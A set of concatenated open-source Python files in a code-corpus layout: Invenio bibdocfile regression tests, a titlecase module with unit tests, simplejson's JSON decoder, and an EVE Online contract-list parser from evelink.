bibdoc1_ver = 1, bibdoc2_ver = 2,
rel_type = "some_rel")
self.assertEqual("key1" in newer_rel1, False)
self.assertEqual("key1" in newer_rel2, False)
newer_rel1.delete()
newer_rel2.delete()
class BibDocFilesTest(InvenioTestCase):
"""regression tests about BibDocFiles"""
def test_BibDocFiles(self):
"""bibdocfile - BibDocFile functions """
#add bibdoc
my_bibrecdoc = BibRecDocs(2)
timestamp = datetime(*(time.strptime("2010-09-08 07:06:05", "%Y-%m-%d %H:%M:%S")[:6]))
my_bibrecdoc.add_new_file(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', 'Main', 'img_test', False, 'test add new file', 'test', '.jpg', modification_date=timestamp)
my_new_bibdoc = my_bibrecdoc.get_bibdoc("img_test")
my_new_bibdocfile = my_new_bibdoc.list_all_files()[0]
#get url
self.assertEqual(my_new_bibdocfile.get_url(), CFG_SITE_URL + '/%s/2/files/img_test.jpg' % CFG_SITE_RECORD)
#get type
self.assertEqual(my_new_bibdocfile.get_type(), 'Main')
#get path
# we should not test for a particular path! that is the concern of the underlying
# implementation, not of the interface, which is what should be tested
# self.assert_(my_new_bibdocfile.get_path().startswith(CFG_BIBDOCFILE_FILEDIR))
# self.assert_(my_new_bibdocfile.get_path().endswith('/img_test.jpg;1'))
#get bibdocid
self.assertEqual(my_new_bibdocfile.get_bibdocid(), my_new_bibdoc.get_id())
#get name
self.assertEqual(my_new_bibdocfile.get_name() , 'img_test')
#get full name
self.assertEqual(my_new_bibdocfile.get_full_name() , 'img_test.jpg')
#get full path
#self.assert_(my_new_bibdocfile.get_full_path().startswith(CFG_BIBDOCFILE_FILEDIR))
#self.assert_(my_new_bibdocfile.get_full_path().endswith('/img_test.jpg;1'))
#get format
self.assertEqual(my_new_bibdocfile.get_format(), '.jpg')
#get version
self.assertEqual(my_new_bibdocfile.get_version(), 1)
#get description
self.assertEqual(my_new_bibdocfile.get_description(), my_new_bibdoc.get_description('.jpg', version=1))
#get comment
self.assertEqual(my_new_bibdocfile.get_comment(), my_new_bibdoc.get_comment('.jpg', version=1))
#get recid
self.assertEqual(my_new_bibdocfile.get_recid(), 2)
#get status
self.assertEqual(my_new_bibdocfile.get_status(), '')
#get size
self.assertEqual(my_new_bibdocfile.get_size(), 91750)
#get checksum
self.assertEqual(my_new_bibdocfile.get_checksum(), '28ec893f9da735ad65de544f71d4ad76')
#check
self.assertEqual(my_new_bibdocfile.check(), True)
#display
tmpl = invenio.template.load("bibdocfile")
value = tmpl.tmpl_display_bibdocfile(my_new_bibdocfile, ln='en')
assert 'files/img_test.jpg?version=1">' in value
#hidden?
self.assertEqual(my_new_bibdocfile.hidden_p(), False)
#check modification date
self.assertEqual(my_new_bibdocfile.md, timestamp)
#delete
my_new_bibdoc.delete()
self.assertEqual(my_new_bibdoc.deleted_p(), True)
class CheckBibDocAuthorizationTest(InvenioTestCase):
"""Regression tests for check_bibdoc_authorization function."""
def test_check_bibdoc_authorization(self):
"""bibdocfile - check_bibdoc_authorization function"""
from invenio.webuser import collect_user_info, get_uid_from_email
jekyll = collect_user_info(get_uid_from_email('jekyll@cds.cern.ch'))
self.assertEqual(check_bibdoc_authorization(jekyll, 'role:thesesviewer'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(jekyll, 'role: thesesviewer'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(jekyll, 'role: thesesviewer'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(jekyll, 'Role: thesesviewer'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(jekyll, 'email: jekyll@cds.cern.ch'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(jekyll, 'email: jekyll@cds.cern.ch'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
juliet = collect_user_info(get_uid_from_email('juliet.capulet@cds.cern.ch'))
self.assertEqual(check_bibdoc_authorization(juliet, 'restricted_picture'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(juliet, 'status: restricted_picture'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertNotEqual(check_bibdoc_authorization(juliet, 'restricted_video')[0], 0)
self.assertNotEqual(check_bibdoc_authorization(juliet, 'status: restricted_video')[0], 0)
class BibDocFileURLTest(InvenioTestCase):
"""Regression tests for bibdocfile_url_p function."""
def test_bibdocfile_url_p(self):
"""bibdocfile - check bibdocfile_url_p() functionality"""
self.failUnless(bibdocfile_url_p(CFG_SITE_URL + '/%s/98/files/9709037.pdf' % CFG_SITE_RECORD))
self.failUnless(bibdocfile_url_p(CFG_SITE_URL + '/%s/098/files/9709037.pdf' % CFG_SITE_RECORD))
class MoreInfoTest(InvenioTestCase):
"""regression tests about BibDocFiles"""
def test_initialData(self):
"""Testing if passing the initial data really enriches the existing structure"""
more_info = MoreInfo(docid = 134)
more_info.set_data("ns1", "k1", "vsrjklfh23478956@#%@#@#%")
more_info2 = MoreInfo(docid = 134, initial_data = {"ns1" : { "k2" : "weucb2324@#%@#$%@"}})
self.assertEqual(more_info.get_data("ns1", "k2"), "weucb2324@#%@#$%@")
self.assertEqual(more_info.get_data("ns1", "k1"), "vsrjklfh23478956@#%@#@#%")
self.assertEqual(more_info2.get_data("ns1", "k2"), "weucb2324@#%@#$%@")
self.assertEqual(more_info2.get_data("ns1", "k1"), "vsrjklfh23478956@#%@#@#%")
more_info3 = MoreInfo(docid = 134)
self.assertEqual(more_info3.get_data("ns1", "k2"), "weucb2324@#%@#$%@")
self.assertEqual(more_info3.get_data("ns1", "k1"), "vsrjklfh23478956@#%@#@#%")
more_info.del_key("ns1", "k1")
more_info.del_key("ns1", "k2")
def test_createSeparateRead(self):
"""MoreInfo - testing if information saved using one instance is accessible via
a new one"""
more_info = MoreInfo(docid = 13)
more_info.set_data("some_namespace", "some_key", "vsrjklfh23478956@#%@#@#%")
more_info2 = MoreInfo(docid = 13)
self.assertEqual(more_info.get_data("some_namespace", "some_key"), "vsrjklfh23478956@#%@#@#%")
self.assertEqual(more_info2.get_data("some_namespace", "some_key"), "vsrjklfh23478956@#%@#@#%")
more_info2.del_key("some_namespace", "some_key")
def test_DictionaryBehaviour(self):
"""moreinfo - tests assignments of data, both using the general interface and using
namespaces"""
more_info = MoreInfo()
more_info.set_data("namespace1", "key1", "val1")
more_info.set_data("namespace1", "key2", "val2")
more_info.set_data("namespace2", "key1", "val3")
self.assertEqual(more_info.get_data("namespace1", "key1"), "val1")
self.assertEqual(more_info.get_data("namespace1", "key2"), "val2")
self.assertEqual(more_info.get_data("namespace2", "key1"), "val3")
def test_inMemoryMoreInfo(self):
"""test that MoreInfo is really stored only in memory (no database accesses)"""
m1 = MoreInfo(docid = 101, version = 12, cache_only = True)
m2 = MoreInfo(docid = 101, version = 12, cache_reads = False) # The most direct DB access
m1.set_data("n1", "k1", "v1")
self.assertEqual(m2.get_data("n1","k1"), None)
self.assertEqual(m1.get_data("n1","k1"), "v1")
def test_readCacheMoreInfo(self):
"""we verify that if value is not present in the cache, read will happen from the database"""
m1 = MoreInfo(docid = 102, version = 12)
m2 = MoreInfo(docid = 102, version = 12) # The most direct DB access
self.assertEqual(m2.get_data("n11","k11"), None)
self.assertEqual(m1.get_data("n11","k11"), None)
m1.set_data("n11", "k11", "some value")
self.assertEqual(m1.get_data("n11","k11"), "some value")
self.assertEqual(m2.get_data("n11","k11"), "some value") # read from a different instance
m1.delete()
m2.delete()
class BibDocFileMd5FolderTests(InvenioTestCase):
"""Regression test class for the Md5Folder class"""
def setUp(self):
self.path = os.path.join(CFG_TMPDIR, 'md5_tests')
if not os.path.exists(self.path):
os.makedirs(self.path)
def tearDown(self):
shutil.rmtree(self.path)
def test_empty_md5folder(self):
"""bibdocfile - empty Md5Folder"""
self.assertEqual(Md5Folder(self.path).md5s, {})
def test_one_file_md5folder(self):
"""bibdocfile - one file in Md5Folder"""
open(os.path.join(self.path, 'test.txt'), "w").write("test")
md5s = Md5Folder(self.path)
self.assertEqual(md5s.md5s, {'test.txt': '098f6bcd4621d373cade4e832627b4f6'})
def test_adding_one_more_file_md5folder(self):
"""bibdocfile - one more file in Md5Folder"""
open(os.path.join(self.path, 'test.txt'), "w").write("test")
md5s = Md5Folder(self.path)
self.assertEqual(md5s.md5s, {'test.txt': '098f6bcd4621d373cade4e832627b4f6'})
open(os.path.join(self.path, 'test2.txt'), "w").write("second test")
md5s.update()
self.assertEqual(md5s.md5s, {'test.txt': '098f6bcd4621d373cade4e832627b4f6', 'test2.txt': 'f5a6496b3ed4f2d6e5d602c7be8e6b42'})
def test_detect_corruption(self):
"""bibdocfile - detect corruption in Md5Folder"""
open(os.path.join(self.path, 'test.txt'), "w").write("test")
md5s = Md5Folder(self.path)
open(os.path.join(self.path, 'test.txt'), "w").write("second test")
self.failIf(md5s.check('test.txt'))
md5s.update(only_new=False)
self.failUnless(md5s.check('test.txt'))
self.assertEqual(md5s.get_checksum('test.txt'), 'f5a6496b3ed4f2d6e5d602c7be8e6b42')
if CFG_PATH_MD5SUM:
def test_md5_algorithms(self):
"""bibdocfile - compare md5 algorithms"""
filepath = os.path.join(self.path, 'test.txt')
open(filepath, "w").write("test")
self.assertEqual(calculate_md5(filepath, force_internal=True), calculate_md5_external(filepath))
TEST_SUITE = make_test_suite(BibDocFileMd5FolderTests,
BibRecDocsTest,
BibDocsTest,
BibDocFilesTest,
MoreInfoTest,
BibRelationTest,
BibDocFileURLTest,
CheckBibDocAuthorizationTest,
BibDocFsInfoTest,
BibDocFileGuessFormat)
if __name__ == "__main__":
run_test_suite(TEST_SUITE, warn_user=True)
|
gpl-2.0
|
LettError/filibuster
|
Lib/filibuster/titlecase.py
|
1
|
9269
|
# -*- coding: UTF-8 -*-
"""
titlecase.py v0.2
Original Perl version by: John Gruber http://daringfireball.net/ 10 May 2008
Python version by Stuart Colville http://muffinresearch.co.uk
License: http://www.opensource.org/licenses/mit-license.php
"""
import unittest
import sys
import re
SMALL = 'a|an|and|as|at|but|by|en|for|if|in|of|on|or|the|to|v\.?|via|vs\.?'
PUNCT = "[!\"#$%&'‘()*+,-./:;?@[\\\\\\]_`{|}~]"
SMALL_WORDS = re.compile(r'^(%s)$' % SMALL, re.I)
INLINE_PERIOD = re.compile(r'[a-zA-Z][.][a-zA-Z]')
UC_ELSEWHERE = re.compile(r'%s*?[a-zA-Z]+[A-Z]+?' % PUNCT)
CAPFIRST = re.compile(r"^%s*?([A-Za-z])" % PUNCT)
SMALL_FIRST = re.compile(r'^(%s*)(%s)\b' % (PUNCT, SMALL), re.I)
SMALL_LAST = re.compile(r'\b(%s)%s?$' % (SMALL, PUNCT), re.I)
SUBPHRASE = re.compile(r'([:.;?!][ ])(%s)' % SMALL)
def titlecase(text):
"""
Titlecases input text
This filter changes all words to Title Caps, and attempts to be clever
about *un*capitalizing SMALL words like a/an/the in the input.
The list of "SMALL words" which are not capped comes from
the New York Times Manual of Style, plus 'vs' and 'v'.
"""
words = re.split(r'\s', text)
line = []
for word in words:
if INLINE_PERIOD.search(word) or UC_ELSEWHERE.match(word):
line.append(word)
continue
if SMALL_WORDS.match(word):
line.append(word.lower())
continue
line.append(CAPFIRST.sub(lambda m: m.group(0).upper(), word))
line = " ".join(line)
line = SMALL_FIRST.sub(lambda m: '%s%s' % (
m.group(1),
m.group(2).capitalize()
), line)
line = SMALL_LAST.sub(lambda m: m.group(0).capitalize(), line)
line = SUBPHRASE.sub(lambda m: '%s%s' % (
m.group(1),
m.group(2).capitalize()
), line)
return line
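# A minimal usage sketch, mirroring the tests below:
#
#   titlecase('a thing')                     # -> 'A Thing'
#   titlecase('this is just an example.com') # -> 'This Is Just an example.com'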
class TitlecaseTests(unittest.TestCase):
"""Tests to ensure titlecase follows all of the rules"""
def test_q_and_a(self):
u"""Testing: Q&A With Steve Jobs: 'That’s What Happens In Technology' """
text = titlecase(
u"Q&A with steve jobs: 'that’s what happens in technology'"
)
result = u"Q&A With Steve Jobs: 'That’s What Happens in Technology'"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_at_and_t(self):
u"""Testing: What Is AT&T's Problem?"""
text = titlecase(u"What is AT&T’s problem?")
result = u"What Is AT&T’s Problem?"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_apple_deal(self):
"""Testing: Apple Deal With AT&T Falls Through"""
text = titlecase("Apple deal with AT&T falls through")
result = "Apple Deal With AT&T Falls Through"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_this_v_that(self):
"""Testing: this v that"""
text = titlecase("this v that")
result = "This v That"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_this_v_that2(self):
"""Testing: this v. that"""
text = titlecase("this v. that")
result = "This v. That"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_this_vs_that(self):
"""Testing: this vs that"""
text = titlecase("this vs that")
result = "This vs That"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_this_vs_that2(self):
"""Testing: this vs. that"""
text = titlecase("this vs. that")
result = "This vs. That"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_apple_sec(self):
u"""Testing: The SEC’s Apple Probe: What You Need to Know"""
text = titlecase("The SEC’s Apple Probe: What You Need to Know")
result = u"The SEC’s Apple Probe: What You Need to Know"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_small_word_quoted(self):
"""Testing: 'by the Way, Small word at the start but within quotes.'"""
text = titlecase(
"'by the Way, small word at the start but within quotes.'"
)
result = "'By the Way, Small Word at the Start but Within Quotes.'"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_small_word_end(self):
"""Testing: Small word at end is nothing to be afraid of"""
text = titlecase("Small word at end is nothing to be afraid of")
result = "Small Word at End Is Nothing to Be Afraid Of"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_sub_phrase_small_word(self):
"""Testing: Starting Sub-Phrase With a Small Word: a Trick, Perhaps?"""
text = titlecase(
"Starting Sub-Phrase With a Small Word: a Trick, Perhaps?"
)
result = "Starting Sub-Phrase With a Small Word: A Trick, Perhaps?"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_small_word_quotes(self):
"""Testing: Sub-Phrase With a Small Word in Quotes: 'a Trick..."""
text = titlecase(
"Sub-Phrase With a Small Word in Quotes: 'a Trick, Perhaps?'"
)
result = "Sub-Phrase With a Small Word in Quotes: 'A Trick, Perhaps?'"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_small_word_double_quotes(self):
"""Testing: Sub-Phrase With a Small Word in Quotes: \"a Trick..."""
text = titlecase(
'Sub-Phrase With a Small Word in Quotes: "a Trick, Perhaps?"'
)
result = 'Sub-Phrase With a Small Word in Quotes: "A Trick, Perhaps?"'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_nothing_to_be_afraid_of(self):
"""Testing: \"Nothing to Be Afraid of?\""""
text = titlecase('"Nothing to Be Afraid of?"')
result = '"Nothing to Be Afraid Of?"'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_nothing_to_be_afraid_of2(self):
"""Testing: \"Nothing to Be Afraid Of?\""""
text = titlecase('"Nothing to be Afraid Of?"')
result = '"Nothing to Be Afraid Of?"'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_a_thing(self):
"""Testing: a thing"""
text = titlecase('a thing')
result = 'A Thing'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_vapourware(self):
"""Testing: 2lmc Spool: 'Gruber on OmniFocus and Vapo(u)rware'"""
text = titlecase(
"2lmc Spool: 'gruber on OmniFocus and vapo(u)rware'"
)
result = "2lmc Spool: 'Gruber on OmniFocus and Vapo(u)rware'"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_domains(self):
"""Testing: this is just an example.com"""
text = titlecase('this is just an example.com')
result = 'This Is Just an example.com'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_domains2(self):
"""Testing: this is something listed on an del.icio.us"""
text = titlecase('this is something listed on del.icio.us')
result = 'This Is Something Listed on del.icio.us'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_itunes(self):
"""Testing: iTunes should be unmolested"""
text = titlecase('iTunes should be unmolested')
result = 'iTunes Should Be Unmolested'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_thoughts_on_music(self):
u"""Testing: Reading Between the Lines of Steve Jobs’s..."""
text = titlecase(
u'Reading between the lines of steve jobs’s ‘thoughts on music’'
)
result = u'Reading Between the Lines of Steve Jobs’s ‘Thoughts on Music’'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_repair_perms(self):
u"""Testing: Seriously, ‘Repair Permissions’ Is Voodoo"""
text = titlecase(u'seriously, ‘repair permissions’ is voodoo')
result = u'Seriously, ‘Repair Permissions’ Is Voodoo'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_generalissimo(self):
"""Testing: Generalissimo Francisco Franco..."""
text = titlecase(
'generalissimo francisco franco: still dead; kieren McCarthy: '\
'still a jackass'
)
result = u"""Generalissimo Francisco Franco: Still Dead; Kieren McCarthy: Still a Jackass."""
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
if __name__ == '__main__':
if not sys.stdin.isatty():
for line in sys.stdin:
print(titlecase(line))
else:
suite = unittest.TestLoader().loadTestsFromTestCase(TitlecaseTests)
unittest.TextTestRunner(verbosity=2).run(suite)
|
mit
|
Pathoschild/stewbot
|
stewbot/components/modules/simplejson/decoder.py
|
296
|
15152
|
"""Implementation of JSONDecoder
"""
import re
import sys
import struct
from simplejson.scanner import make_scanner
def _import_c_scanstring():
try:
from simplejson._speedups import scanstring
return scanstring
except ImportError:
return None
c_scanstring = _import_c_scanstring()
__all__ = ['JSONDecoder']
FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL
def _floatconstants():
_BYTES = '7FF80000000000007FF0000000000000'.decode('hex')
# The struct module in Python 2.4 would get frexp() out of range here
# when an endian is specified in the format string. Fixed in Python 2.5+
if sys.byteorder != 'big':
_BYTES = _BYTES[:8][::-1] + _BYTES[8:][::-1]
nan, inf = struct.unpack('dd', _BYTES)
return nan, inf, -inf
NaN, PosInf, NegInf = _floatconstants()
class JSONDecodeError(ValueError):
"""Subclass of ValueError with the following additional properties:
msg: The unformatted error message
doc: The JSON document being parsed
pos: The start index of doc where parsing failed
end: The end index of doc where parsing failed (may be None)
lineno: The line corresponding to pos
colno: The column corresponding to pos
endlineno: The line corresponding to end (may be None)
endcolno: The column corresponding to end (may be None)
"""
def __init__(self, msg, doc, pos, end=None):
ValueError.__init__(self, errmsg(msg, doc, pos, end=end))
self.msg = msg
self.doc = doc
self.pos = pos
self.end = end
self.lineno, self.colno = linecol(doc, pos)
if end is not None:
self.endlineno, self.endcolno = linecol(doc, end)
else:
self.endlineno, self.endcolno = None, None
def linecol(doc, pos):
lineno = doc.count('\n', 0, pos) + 1
if lineno == 1:
colno = pos
else:
colno = pos - doc.rindex('\n', 0, pos)
return lineno, colno
def errmsg(msg, doc, pos, end=None):
# Note that this function is called from _speedups
lineno, colno = linecol(doc, pos)
if end is None:
#fmt = '{0}: line {1} column {2} (char {3})'
#return fmt.format(msg, lineno, colno, pos)
fmt = '%s: line %d column %d (char %d)'
return fmt % (msg, lineno, colno, pos)
endlineno, endcolno = linecol(doc, end)
#fmt = '{0}: line {1} column {2} - line {3} column {4} (char {5} - {6})'
#return fmt.format(msg, lineno, colno, endlineno, endcolno, pos, end)
fmt = '%s: line %d column %d - line %d column %d (char %d - %d)'
return fmt % (msg, lineno, colno, endlineno, endcolno, pos, end)
_CONSTANTS = {
'-Infinity': NegInf,
'Infinity': PosInf,
'NaN': NaN,
}
STRINGCHUNK = re.compile(r'(.*?)(["\\\x00-\x1f])', FLAGS)
BACKSLASH = {
'"': u'"', '\\': u'\\', '/': u'/',
'b': u'\b', 'f': u'\f', 'n': u'\n', 'r': u'\r', 't': u'\t',
}
DEFAULT_ENCODING = "utf-8"
def py_scanstring(s, end, encoding=None, strict=True,
_b=BACKSLASH, _m=STRINGCHUNK.match):
"""Scan the string s for a JSON string. End is the index of the
character in s after the quote that started the JSON string.
Unescapes all valid JSON string escape sequences and raises ValueError
on attempt to decode an invalid string. If strict is False then literal
control characters are allowed in the string.
Returns a tuple of the decoded string and the index of the character in s
after the end quote."""
if encoding is None:
encoding = DEFAULT_ENCODING
chunks = []
_append = chunks.append
begin = end - 1
while 1:
chunk = _m(s, end)
if chunk is None:
raise JSONDecodeError(
"Unterminated string starting at", s, begin)
end = chunk.end()
content, terminator = chunk.groups()
# Content contains zero or more unescaped string characters
if content:
if not isinstance(content, unicode):
content = unicode(content, encoding)
_append(content)
# Terminator is the end of string, a literal control character,
# or a backslash denoting that an escape sequence follows
if terminator == '"':
break
elif terminator != '\\':
if strict:
msg = "Invalid control character %r at" % (terminator,)
#msg = "Invalid control character {0!r} at".format(terminator)
raise JSONDecodeError(msg, s, end)
else:
_append(terminator)
continue
try:
esc = s[end]
except IndexError:
raise JSONDecodeError(
"Unterminated string starting at", s, begin)
# If not a unicode escape sequence, must be in the lookup table
if esc != 'u':
try:
char = _b[esc]
except KeyError:
msg = "Invalid \\escape: " + repr(esc)
raise JSONDecodeError(msg, s, end)
end += 1
else:
# Unicode escape sequence
esc = s[end + 1:end + 5]
next_end = end + 5
if len(esc) != 4:
msg = "Invalid \\uXXXX escape"
raise JSONDecodeError(msg, s, end)
uni = int(esc, 16)
# Check for surrogate pair on UCS-4 systems
if 0xd800 <= uni <= 0xdbff and sys.maxunicode > 65535:
msg = "Invalid \\uXXXX\\uXXXX surrogate pair"
if not s[end + 5:end + 7] == '\\u':
raise JSONDecodeError(msg, s, end)
esc2 = s[end + 7:end + 11]
if len(esc2) != 4:
raise JSONDecodeError(msg, s, end)
uni2 = int(esc2, 16)
uni = 0x10000 + (((uni - 0xd800) << 10) | (uni2 - 0xdc00))
next_end += 6
char = unichr(uni)
end = next_end
# Append the unescaped character
_append(char)
return u''.join(chunks), end
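# A worked example (computed by hand): py_scanstring('"abc"', 1) consumes the
# three characters after the opening quote plus the closing quote and returns
# (u'abc', 5).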
# Use speedup if available
scanstring = c_scanstring or py_scanstring
WHITESPACE = re.compile(r'[ \t\n\r]*', FLAGS)
WHITESPACE_STR = ' \t\n\r'
def JSONObject((s, end), encoding, strict, scan_once, object_hook,
object_pairs_hook, memo=None,
_w=WHITESPACE.match, _ws=WHITESPACE_STR):
# Backwards compatibility
if memo is None:
memo = {}
memo_get = memo.setdefault
pairs = []
# Use a slice to prevent IndexError from being raised, the following
# check will raise a more specific ValueError if the string is empty
nextchar = s[end:end + 1]
# Normally we expect nextchar == '"'
if nextchar != '"':
if nextchar in _ws:
end = _w(s, end).end()
nextchar = s[end:end + 1]
# Trivial empty object
if nextchar == '}':
if object_pairs_hook is not None:
result = object_pairs_hook(pairs)
return result, end
pairs = {}
if object_hook is not None:
pairs = object_hook(pairs)
return pairs, end + 1
elif nextchar != '"':
raise JSONDecodeError("Expecting property name", s, end)
end += 1
while True:
key, end = scanstring(s, end, encoding, strict)
key = memo_get(key, key)
# To skip some function call overhead we optimize the fast paths where
# the JSON key separator is ": " or just ":".
if s[end:end + 1] != ':':
end = _w(s, end).end()
if s[end:end + 1] != ':':
raise JSONDecodeError("Expecting : delimiter", s, end)
end += 1
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
try:
value, end = scan_once(s, end)
except StopIteration:
raise JSONDecodeError("Expecting object", s, end)
pairs.append((key, value))
try:
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar == '}':
break
elif nextchar != ',':
raise JSONDecodeError("Expecting , delimiter", s, end - 1)
try:
nextchar = s[end]
if nextchar in _ws:
end += 1
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar != '"':
raise JSONDecodeError("Expecting property name", s, end - 1)
if object_pairs_hook is not None:
result = object_pairs_hook(pairs)
return result, end
pairs = dict(pairs)
if object_hook is not None:
pairs = object_hook(pairs)
return pairs, end
def JSONArray((s, end), scan_once, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
values = []
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
# Look-ahead for trivial empty array
if nextchar == ']':
return values, end + 1
_append = values.append
while True:
try:
value, end = scan_once(s, end)
except StopIteration:
raise JSONDecodeError("Expecting object", s, end)
_append(value)
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
end += 1
if nextchar == ']':
break
elif nextchar != ',':
raise JSONDecodeError("Expecting , delimiter", s, end)
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
return values, end
class JSONDecoder(object):
"""Simple JSON <http://json.org> decoder
Performs the following translations in decoding by default:
+---------------+-------------------+
| JSON | Python |
+===============+===================+
| object | dict |
+---------------+-------------------+
| array | list |
+---------------+-------------------+
| string | unicode |
+---------------+-------------------+
| number (int) | int, long |
+---------------+-------------------+
| number (real) | float |
+---------------+-------------------+
| true | True |
+---------------+-------------------+
| false | False |
+---------------+-------------------+
| null | None |
+---------------+-------------------+
It also understands ``NaN``, ``Infinity``, and ``-Infinity`` as
their corresponding ``float`` values, which is outside the JSON spec.
"""
def __init__(self, encoding=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, strict=True,
object_pairs_hook=None):
"""
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work;
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
*strict* controls the parser's behavior when it encounters an
invalid control character in a string. The default setting of
        ``True`` means that unescaped control characters are parse errors; if
        ``False``, control characters are allowed in strings.
"""
self.encoding = encoding
self.object_hook = object_hook
self.object_pairs_hook = object_pairs_hook
self.parse_float = parse_float or float
self.parse_int = parse_int or int
self.parse_constant = parse_constant or _CONSTANTS.__getitem__
self.strict = strict
self.parse_object = JSONObject
self.parse_array = JSONArray
self.parse_string = scanstring
self.memo = {}
self.scan_once = make_scanner(self)
def decode(self, s, _w=WHITESPACE.match):
"""Return the Python representation of ``s`` (a ``str`` or ``unicode``
instance containing a JSON document)
"""
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
end = _w(s, end).end()
if end != len(s):
raise JSONDecodeError("Extra data", s, end, len(s))
return obj
def raw_decode(self, s, idx=0):
"""Decode a JSON document from ``s`` (a ``str`` or ``unicode``
beginning with a JSON document) and return a 2-tuple of the Python
representation and the index in ``s`` where the document ended.
This can be used to decode a JSON document from a string that may
have extraneous data at the end.
"""
try:
obj, end = self.scan_once(s, idx)
except StopIteration:
raise JSONDecodeError("No JSON object could be decoded", s, idx)
return obj, end
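# Illustrative usage sketch (not part of the original module); the documents
# below are invented examples:
#
#     >>> d = JSONDecoder()
#     >>> d.decode('{"a": [1, 2.5, null]}')
#     {u'a': [1, 2.5, None]}
#     >>> # raw_decode reports where parsing stopped, tolerating trailing data
#     >>> d.raw_decode('{"a": 1} trailing')
#     ({u'a': 1}, 8)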
|
isc
|
zigdon/evelink
|
evelink/parsing/contracts.py
|
9
|
1347
|
from evelink import api
from evelink import constants
import time
def parse_contracts(api_result):
rowset = api_result.find('rowset')
if rowset is None:
return
results = {}
for row in rowset.findall('row'):
a = row.attrib
contract = {
'id': int(a['contractID']),
'issuer': int(a['issuerID']),
'issuer_corp': int(a['issuerCorpID']),
'assignee': int(a['assigneeID']),
'acceptor': int(a['acceptorID']),
'start': int(a['startStationID']),
'end': int(a['endStationID']),
'type': a['type'],
'status': a['status'],
'corp': a['forCorp'] == '1',
'availability': a['availability'],
'issued': api.parse_ts(a['dateIssued']),
'days': int(a['numDays']),
'price': float(a['price']),
'reward': float(a['reward']),
'collateral': float(a['collateral']),
'buyout': float(a['buyout']),
'volume': float(a['volume']),
'title': a['title']
}
contract['expired'] = api.parse_ts(a['dateExpired'])
contract['accepted'] = api.parse_ts(a['dateAccepted'])
contract['completed'] = api.parse_ts(a['dateCompleted'])
results[contract['id']] = contract
return results
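# Illustrative note (not from the original source): api_result is expected to
# be an ElementTree node shaped roughly like the EVE API contract list, e.g.
#
#     <result>
#       <rowset name="contractList">
#         <row contractID="1" issuerID="2" ... dateIssued="2012-01-01 00:00:00"/>
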